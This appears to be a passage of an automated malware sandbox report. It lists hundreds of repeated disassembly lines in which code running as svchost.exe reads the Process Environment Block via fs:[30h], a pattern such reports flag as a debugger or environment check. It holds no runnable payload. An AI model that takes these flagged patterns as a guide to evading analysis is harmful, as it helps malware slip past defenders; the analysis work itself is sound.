Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE388 mov eax, dword ptr fs:[00000030h]	2_2_00AFE388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE388 mov eax, dword ptr fs:[00000030h]	2_2_00AFE388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE388 mov eax, dword ptr fs:[00000030h]	2_2_00AFE388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF8397 mov eax, dword ptr fs:[00000030h]	2_2_00AF8397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF8397 mov eax, dword ptr fs:[00000030h]	2_2_00AF8397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF8397 mov eax, dword ptr fs:[00000030h]	2_2_00AF8397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2438F mov eax, dword ptr fs:[00000030h]	2_2_00B2438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2438F mov eax, dword ptr fs:[00000030h]	2_2_00B2438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00B1E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00B1E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E3F0 mov eax, dword ptr fs:[00000030h]	2_2_00B1E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B363FF mov eax, dword ptr fs:[00000030h]	2_2_00B363FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B103E9 mov eax, dword ptr fs:[00000030h]	2_2_00B103E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE3DB mov eax, dword ptr fs:[00000030h]	2_2_00BAE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE3DB mov eax, dword ptr fs:[00000030h]	2_2_00BAE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE3DB mov ecx, dword ptr fs:[00000030h]	2_2_00BAE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BAE3DB mov eax, dword ptr fs:[00000030h]	2_2_00BAE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA43D4 mov eax, dword ptr fs:[00000030h]	2_2_00BA43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA43D4 mov eax, dword ptr fs:[00000030h]	2_2_00BA43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0A3C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B083C0 mov eax, dword ptr fs:[00000030h]	2_2_00B083C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B083C0 mov eax, dword ptr fs:[00000030h]	2_2_00B083C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B083C0 mov eax, dword ptr fs:[00000030h]	2_2_00B083C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B083C0 mov eax, dword ptr fs:[00000030h]	2_2_00B083C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BBC3CD mov eax, dword ptr fs:[00000030h]	2_2_00BBC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B863C0 mov eax, dword ptr fs:[00000030h]	2_2_00B863C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B20310 mov ecx, dword ptr fs:[00000030h]	2_2_00B20310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A30B mov eax, dword ptr fs:[00000030h]	2_2_00B3A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A30B mov eax, dword ptr fs:[00000030h]	2_2_00B3A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A30B mov eax, dword ptr fs:[00000030h]	2_2_00B3A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFC310 mov ecx, dword ptr fs:[00000030h]	2_2_00AFC310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA437C mov eax, dword ptr fs:[00000030h]	2_2_00BA437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov eax, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov eax, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov eax, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov ecx, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov eax, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8035C mov eax, dword ptr fs:[00000030h]	2_2_00B8035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA8350 mov ecx, dword ptr fs:[00000030h]	2_2_00BA8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BCA352 mov eax, dword ptr fs:[00000030h]	2_2_00BCA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B82349 mov eax, dword ptr fs:[00000030h]	2_2_00B82349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B344B0 mov ecx, dword ptr fs:[00000030h]	2_2_00B344B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8A4B0 mov eax, dword ptr fs:[00000030h]	2_2_00B8A4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B064AB mov eax, dword ptr fs:[00000030h]	2_2_00B064AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B004E5 mov ecx, dword ptr fs:[00000030h]	2_2_00B004E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A430 mov eax, dword ptr fs:[00000030h]	2_2_00B3A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFC427 mov eax, dword ptr fs:[00000030h]	2_2_00AFC427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE420 mov eax, dword ptr fs:[00000030h]	2_2_00AFE420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE420 mov eax, dword ptr fs:[00000030h]	2_2_00AFE420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AFE420 mov eax, dword ptr fs:[00000030h]	2_2_00AFE420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B86420 mov eax, dword ptr fs:[00000030h]	2_2_00B86420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B38402 mov eax, dword ptr fs:[00000030h]	2_2_00B38402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B38402 mov eax, dword ptr fs:[00000030h]	2_2_00B38402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B38402 mov eax, dword ptr fs:[00000030h]	2_2_00B38402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2A470 mov eax, dword ptr fs:[00000030h]	2_2_00B2A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2A470 mov eax, dword ptr fs:[00000030h]	2_2_00B2A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2A470 mov eax, dword ptr fs:[00000030h]	2_2_00B2A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8C460 mov ecx, dword ptr fs:[00000030h]	2_2_00B8C460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2245A mov eax, dword ptr fs:[00000030h]	2_2_00B2245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E443 mov eax, dword ptr fs:[00000030h]	2_2_00B3E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00AF645D mov eax, dword ptr fs:[00000030h]	2_2_00AF645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B245B1 mov eax, dword ptr fs:[00000030h]	2_2_00B245B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B245B1 mov eax, dword ptr fs:[00000030h]	2_2_00B245B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B805A7 mov eax, dword ptr fs:[00000030h]	2_2_00B805A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B805A7 mov eax, dword ptr fs:[00000030h]	2_2_00B805A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B805A7 mov eax, dword ptr fs:[00000030h]	2_2_00B805A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E59C mov eax, dword ptr fs:[00000030h]	2_2_00B3E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B02582 mov eax, dword ptr fs:[00000030h]	2_2_00B02582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B02582 mov ecx, dword ptr fs:[00000030h]	2_2_00B02582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B34588 mov eax, dword ptr fs:[00000030h]	2_2_00B34588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B025E0 mov eax, dword ptr fs:[00000030h]	2_2_00B025E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E5E7 mov eax, dword ptr fs:[00000030h]	2_2_00B2E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C5ED mov eax, dword ptr fs:[00000030h]	2_2_00B3C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C5ED mov eax, dword ptr fs:[00000030h]	2_2_00B3C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B065D0 mov eax, dword ptr fs:[00000030h]	2_2_00B065D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A5D0 mov eax, dword ptr fs:[00000030h]	2_2_00B3A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A5D0 mov eax, dword ptr fs:[00000030h]	2_2_00B3A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E5CF mov eax, dword ptr fs:[00000030h]	2_2_00B3E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3E5CF mov eax, dword ptr fs:[00000030h]	2_2_00B3E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10535 mov eax, dword ptr fs:[00000030h]	2_2_00B10535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E53E mov eax, dword ptr fs:[00000030h]	2_2_00B2E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E53E mov eax, dword ptr fs:[00000030h]	2_2_00B2E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E53E mov eax, dword ptr fs:[00000030h]	2_2_00B2E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E53E mov eax, dword ptr fs:[00000030h]	2_2_00B2E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B2E53E mov eax, dword ptr fs:[00000030h]	2_2_00B2E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B96500 mov eax, dword ptr fs:[00000030h]	2_2_00B96500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BD4500 mov eax, dword ptr fs:[00000030h]	2_2_00BD4500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3656A mov eax, dword ptr fs:[00000030h]	2_2_00B3656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3656A mov eax, dword ptr fs:[00000030h]	2_2_00B3656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3656A mov eax, dword ptr fs:[00000030h]	2_2_00B3656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08550 mov eax, dword ptr fs:[00000030h]	2_2_00B08550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08550 mov eax, dword ptr fs:[00000030h]	2_2_00B08550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B366B0 mov eax, dword ptr fs:[00000030h]	2_2_00B366B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C6A6 mov eax, dword ptr fs:[00000030h]	2_2_00B3C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04690 mov eax, dword ptr fs:[00000030h]	2_2_00B04690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B04690 mov eax, dword ptr fs:[00000030h]	2_2_00B04690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E6F2 mov eax, dword ptr fs:[00000030h]	2_2_00B7E6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E6F2 mov eax, dword ptr fs:[00000030h]	2_2_00B7E6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E6F2 mov eax, dword ptr fs:[00000030h]	2_2_00B7E6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E6F2 mov eax, dword ptr fs:[00000030h]	2_2_00B7E6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B806F1 mov eax, dword ptr fs:[00000030h]	2_2_00B806F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B806F1 mov eax, dword ptr fs:[00000030h]	2_2_00B806F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_00B3A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A6C7 mov eax, dword ptr fs:[00000030h]	2_2_00B3A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B36620 mov eax, dword ptr fs:[00000030h]	2_2_00B36620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B38620 mov eax, dword ptr fs:[00000030h]	2_2_00B38620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1E627 mov eax, dword ptr fs:[00000030h]	2_2_00B1E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0262C mov eax, dword ptr fs:[00000030h]	2_2_00B0262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42619 mov eax, dword ptr fs:[00000030h]	2_2_00B42619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1260B mov eax, dword ptr fs:[00000030h]	2_2_00B1260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7E609 mov eax, dword ptr fs:[00000030h]	2_2_00B7E609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B32674 mov eax, dword ptr fs:[00000030h]	2_2_00B32674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC866E mov eax, dword ptr fs:[00000030h]	2_2_00BC866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BC866E mov eax, dword ptr fs:[00000030h]	2_2_00BC866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A660 mov eax, dword ptr fs:[00000030h]	2_2_00B3A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3A660 mov eax, dword ptr fs:[00000030h]	2_2_00B3A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B1C640 mov eax, dword ptr fs:[00000030h]	2_2_00B1C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BB47A0 mov eax, dword ptr fs:[00000030h]	2_2_00BB47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B007AF mov eax, dword ptr fs:[00000030h]	2_2_00B007AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00BA678E mov eax, dword ptr fs:[00000030h]	2_2_00BA678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B047FB mov eax, dword ptr fs:[00000030h]	2_2_00B047FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B047FB mov eax, dword ptr fs:[00000030h]	2_2_00B047FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8E7E1 mov eax, dword ptr fs:[00000030h]	2_2_00B8E7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B227ED mov eax, dword ptr fs:[00000030h]	2_2_00B227ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B227ED mov eax, dword ptr fs:[00000030h]	2_2_00B227ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B227ED mov eax, dword ptr fs:[00000030h]	2_2_00B227ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B0C7C0 mov eax, dword ptr fs:[00000030h]	2_2_00B0C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B807C3 mov eax, dword ptr fs:[00000030h]	2_2_00B807C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B7C730 mov eax, dword ptr fs:[00000030h]	2_2_00B7C730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3273C mov eax, dword ptr fs:[00000030h]	2_2_00B3273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3273C mov ecx, dword ptr fs:[00000030h]	2_2_00B3273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3273C mov eax, dword ptr fs:[00000030h]	2_2_00B3273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C720 mov eax, dword ptr fs:[00000030h]	2_2_00B3C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C720 mov eax, dword ptr fs:[00000030h]	2_2_00B3C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00710 mov eax, dword ptr fs:[00000030h]	2_2_00B00710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B30710 mov eax, dword ptr fs:[00000030h]	2_2_00B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B3C700 mov eax, dword ptr fs:[00000030h]	2_2_00B3C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B08770 mov eax, dword ptr fs:[00000030h]	2_2_00B08770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B10770 mov eax, dword ptr fs:[00000030h]	2_2_00B10770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B00750 mov eax, dword ptr fs:[00000030h]	2_2_00B00750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42750 mov eax, dword ptr fs:[00000030h]	2_2_00B42750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B42750 mov eax, dword ptr fs:[00000030h]	2_2_00B42750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00B8E75D mov eax, dword ptr fs:[00000030h]	2_2_00B8E75D
